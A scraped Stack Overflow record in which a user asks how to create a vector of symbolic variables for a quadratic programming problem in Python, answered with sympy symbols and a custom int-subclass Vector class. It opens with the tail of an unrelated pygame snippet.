pg.display.set_caption(\"Linea\")\n self.ven = pg.display.set_mode(self.ven_tam)\n self.figs = []\n self.reloj = pg.time.Clock()\n \n def check_events(self):\n for event in pg.event.get():\n if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):\n quit()\n\n def run(self):\n cirCreater = CreaObjects(self.figs)\n while True:\n self.check_events()\n cirCreater.update()\n \n self.ven.fill(pg.Color('#404040'))\n for fig in self.figs:\n fig.dibujar(self.ven)\n pg.display.flip()\n self.reloj.tick(60)\n \nif __name__ == '__main__':\n ven = Ventana()\n ven.run()\n\n"
] | [
1
] | [] | [] | [
"class",
"pygame",
"python"
] | stackoverflow_0074595968_class_pygame_python.txt |
Q:
Filling a vector with a varying amount of variables
Hey currently I'm trying to program a quadratic programming algorithm with Python.
My goal:
I want to program a function where the given parameters are one vector c, and a matrix G. They are connected through the function Phi = 0.5 *(x^T * G * x) + c^T *x (x^T in this context means vector x transposed). The goal of the function is to find a vector x so that the function Phi is minimized. In order to do that, I need to perform some algebraic calculations (multiplication, transposing and deriving the gradient of the function Phi).
My problem: But I'm struggling with creating a vector which indicates the dimensions of the problem. I am trying to create a vector x = [x_1, x_2, x_3, ..., x_N] which containts N elements. N varies. The elements 'x_N' should be variables (since I want to compute them later on, but I need them 'beforehand' to calculate e.g. the gradient).
My code so far: ('NoE'... is equal to N+1, thats why Im substracting 1 in my while statement)
#filling the x-vector according to the dimension of the given problem
temp_2 = 0
while temp_2 <= (NoE-1):
x[temp_2]= 'x_' + temp_2
print(x)
The previous answer just helped me partially:
The only problem I am encountering now, is that those are all strings and I cant perform any kind of mathematical operation with them (like multiplying them with a matrix). Do you know any fix how I can still do it with strings?
Or do you think I could use the sympy library (which would help me with future calculations)?
Im open to every suggestion of solving this, since I dont have a lot of experience in programming generally
Thanks in advance!
A:
Sounds like an x y problem, because I don't understand how you are going to initialize those variables. If you provide more context I will update my answer.
If you want to have your list to contain variables or "symbols" on which you do algebraic operations, then the standard library doesn't have that, but you can use sympy:
import sympy
from sympy import symbols
### First we initialize some Symbol objects
# this does essentially what you were doing in the question, but in one line
# see list comprehensions*
symbol_names = [f'x_{i}' for i in range(NoE-1)]
# then we make them become 'Symbols'
x = symbols(symbol_names)
### Next we can do stuff with them:
# multiply the first two
expr = x[0] * x[1]
print(expr) # x_0*x_1
# evaluate the expression `expr` with x_0=3, x_1=2
res = expr.evalf(subs={'x_0':3, 'x_1':2})
print(res) # 6.00000
Even though the sympy code above answer your question as it is, I don't think that it's the best solution to the problem you were describing.
For example you could just have a list called x and then you populate it with elements
x = []
for i in range(NoE-1):
x.append(
float(input(f'insert value x_{i}'))
)
This way x will have all the inputted elements and you can access them via x[0], x[1], and so on.
* docs.python.org/3/tutorial/datastructures.html#list-comprehensions
A:
You can create you own type (class) and implement any logic you want there:
class Vector(int):
def __new__(cls, name: str, number: int):
created_object = super().__new__(cls, number)
return created_object
def __init__(self, name, number):
self.name = name
self.number = number
# print(f'{name} is called with number={number}')
# if ypu want to get the same type after math operation
# you'll have to implement all magics like so
## otherwise comment it and you'll get the result of int type on multiplying
def __mul__(self, other):
return Vector("".join([self.name, "*",other.name]), self.number * other.number)
def __repr__(self):
return f'{self.name}: {self.number}'
v1 = Vector("v1", 3)
v2 = Vector("v2", 4)
print(v1)
print(v2)
print(v1*v2)
# int result as it is not implemented in class
v3 = v1 + v2
print(v3)
v = [ Vector(f"v_{x}", x+1) for x in range(0,2)]
print(v)
t = [mv * v1 for mv in v]
print(t)
| Filling a vector with a varying amount of variables | Hey currently I'm trying to program a quadratic programming algorithm with Python.
My goal:
I want to program a function where the given parameters are one vector c, and a matrix G. They are connected through the function Phi = 0.5 *(x^T * G * x) + c^T *x (x^T in this context means vector x transposed). The goal of the function is to find a vector x so that the function Phi is minimized. In order to do that, I need to perform some algebraic calculations (multiplication, transposing and deriving the gradient of the function Phi).
My problem: But I'm struggling with creating a vector which indicates the dimensions of the problem. I am trying to create a vector x = [x_1, x_2, x_3, ..., x_N] which containts N elements. N varies. The elements 'x_N' should be variables (since I want to compute them later on, but I need them 'beforehand' to calculate e.g. the gradient).
My code so far: ('NoE'... is equal to N+1, thats why Im substracting 1 in my while statement)
#filling the x-vector according to the dimension of the given problem
temp_2 = 0
while temp_2 <= (NoE-1):
x[temp_2]= 'x_' + temp_2
print(x)
The previous answer just helped me partially:
The only problem I am encountering now, is that those are all strings and I cant perform any kind of mathematical operation with them (like multiplying them with a matrix). Do you know any fix how I can still do it with strings?
Or do you think I could use the sympy library (which would help me with future calculations)?
Im open to every suggestion of solving this, since I dont have a lot of experience in programming generally
Thanks in advance!
| [
"Sounds like an x y problem, because I don't understand how you are going to initialize those variables. If you provide more context I will update my answer.\nIf you want to have your list to contain variables or \"symbols\" on which you do algebraic operations, then the standard library doesn't have that, but you can use sympy:\nimport sympy\nfrom sympy import symbols\n\n### First we initialize some Symbol objects\n\n# this does essentially what you were doing in the question, but in one line\n# see list comprehensions* \nsymbol_names = [f'x_{i}' for i in range(NoE-1)]\n\n# then we make them become 'Symbols'\nx = symbols(symbol_names)\n\n### Next we can do stuff with them:\n\n# multiply the first two\nexpr = x[0] * x[1]\nprint(expr) # x_0*x_1\n\n# evaluate the expression `expr` with x_0=3, x_1=2\nres = expr.evalf(subs={'x_0':3, 'x_1':2})\nprint(res) # 6.00000\n\nEven though the sympy code above answer your question as it is, I don't think that it's the best solution to the problem you were describing.\nFor example you could just have a list called x and then you populate it with elements\nx = []\nfor i in range(NoE-1):\n x.append(\n float(input(f'insert value x_{i}'))\n )\n\nThis way x will have all the inputted elements and you can access them via x[0], x[1], and so on.\n\n* docs.python.org/3/tutorial/datastructures.html#list-comprehensions\n",
"You can create you own type (class) and implement any logic you want there:\nclass Vector(int):\n def __new__(cls, name: str, number: int):\n created_object = super().__new__(cls, number)\n return created_object\n\n def __init__(self, name, number):\n self.name = name \n self.number = number\n # print(f'{name} is called with number={number}')\n \n # if ypu want to get the same type after math operation\n # you'll have to implement all magics like so\n ## otherwise comment it and you'll get the result of int type on multiplying\n def __mul__(self, other):\n return Vector(\"\".join([self.name, \"*\",other.name]), self.number * other.number)\n \n def __repr__(self):\n return f'{self.name}: {self.number}'\n\nv1 = Vector(\"v1\", 3)\nv2 = Vector(\"v2\", 4)\n\nprint(v1)\nprint(v2)\n\nprint(v1*v2)\n\n# int result as it is not implemented in class\nv3 = v1 + v2\nprint(v3)\n\n\nv = [ Vector(f\"v_{x}\", x+1) for x in range(0,2)]\n\nprint(v)\n\nt = [mv * v1 for mv in v]\n\nprint(t)\n\n"
] | [
1,
0
] | [] | [] | [
"arrays",
"python",
"variables"
] | stackoverflow_0074590267_arrays_python_variables.txt |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.